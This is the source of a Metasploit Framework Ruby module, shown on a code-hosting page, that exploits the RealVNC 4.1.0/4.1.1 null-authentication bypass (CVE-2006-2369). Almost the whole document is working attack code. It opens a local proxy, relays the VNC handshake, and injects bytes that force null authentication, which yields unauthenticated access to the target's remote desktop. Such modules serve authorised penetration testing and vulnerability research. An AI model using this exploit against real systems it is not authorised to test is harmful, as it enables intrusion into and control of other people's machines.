Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Tcp
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => 'RealVNC NULL Authentication Mode Bypass',
14
'Description' => %q{
15
This module exploits an Authentication bypass vulnerability
16
in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
17
listener on LPORT and proxies to the target server.
18
19
The AUTOVNC option requires that vncviewer be installed on
20
the attacking machine.
21
},
22
'Author' => [
23
'hdm', # original msf2 module
24
'theLightCosine'
25
],
26
'License' => MSF_LICENSE,
27
'References' => [
28
['BID', '17978'],
29
['OSVDB', '25479'],
30
['URL', 'https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/'],
31
['CVE', '2006-2369'],
32
],
33
'DisclosureDate' => '2006-05-15',
34
'Notes' => {
35
'Stability' => [CRASH_SAFE],
36
'SideEffects' => [IOC_IN_LOGS],
37
'Reliability' => []
38
}
39
)
40
)
41
42
register_options(
43
[
44
OptPort.new('RPORT', [true, 'The port the target VNC Server is listening on', 5900 ]),
45
OptPort.new('LPORT', [true, 'The port the local VNC Proxy should listen on', 5900 ]),
46
OptBool.new('AUTOVNC', [true, 'Automatically launch vncviewer from this host', false])
47
]
48
)
49
end
50
51
def run
52
# starts up the Listener Server
53
print_status('Starting listener...')
54
listener = Rex::Socket::TcpServer.create(
55
'LocalHost' => '0.0.0.0',
56
'LocalPort' => datastore['LPORT'],
57
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
58
)
59
60
# If the autovnc option is set to true this will spawn a vncviewer on the local machine
61
# targeting the proxy listener.
62
if datastore['AUTOVNC']
63
unless check_vncviewer
64
print_error('The vncviewer does not appear to be installed, exiting...')
65
return nil
66
end
67
print_status('Spawning viewer thread...')
68
view = framework.threads.spawn('VncViewerWrapper', false) do
69
system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
70
end
71
end
72
73
# Establishes the connection between the viewier and the remote server
74
client = listener.accept
75
add_socket(client)
76
77
# Closes the listener socket as it is no longer needed
78
listener.close
79
80
s = connect
81
82
serverhello = s.get_once
83
unless serverhello.include? 'RFB 003.008'
84
print_error('The server is not vulnerable')
85
return
86
end
87
88
# MitM attack on the VNC Authentication Process
89
client.puts(serverhello)
90
clienthello = client.get_once
91
s.puts(clienthello)
92
93
s.read(2)
94
95
print_status('Auth methods received. Sending null authentication option to client')
96
client.write("\x01\x01")
97
client.read(1)
98
s.put("\x01")
99
s.read(4)
100
client.put("\x00\x00\x00\x00")
101
102
# Handles remaining proxy operations between the two sockets
103
closed = false
104
while (closed == false)
105
sockets = []
106
sockets << client
107
sockets << s
108
selected = select(sockets, nil, nil, 0)
109
# print_status ("Selected: #{selected.inspect}")
110
next if selected.nil?
111
112
if selected[0].include?(client)
113
begin
114
data = client.get_once
115
if data.nil?
116
print_error('Client closed connection')
117
closed = true
118
else
119
s.put(data)
120
end
121
rescue StandardError
122
print_error('Client closed connection')
123
closed = true
124
end
125
end
126
127
next unless selected[0].include?(s)
128
129
begin
130
data = s.get_once
131
if data.nil?
132
print_error('Server closed connection')
133
closed = true
134
else
135
client.put(data)
136
end
137
rescue StandardError
138
closed = true
139
end
140
end
141
142
# Close sockets
143
s.close
144
client.close
145
146
if datastore['AUTOVNC']
147
begin
148
view.kill
149
rescue StandardError
150
nil
151
end
152
end
153
end
154
155
def check_vncviewer
156
vnc =
157
Rex::FileUtils.find_full_path('vncviewer') ||
158
Rex::FileUtils.find_full_path('vncviewer.exe')
159
if vnc
160
return true
161
else
162
return false
163
end
164
end
165
end
166
167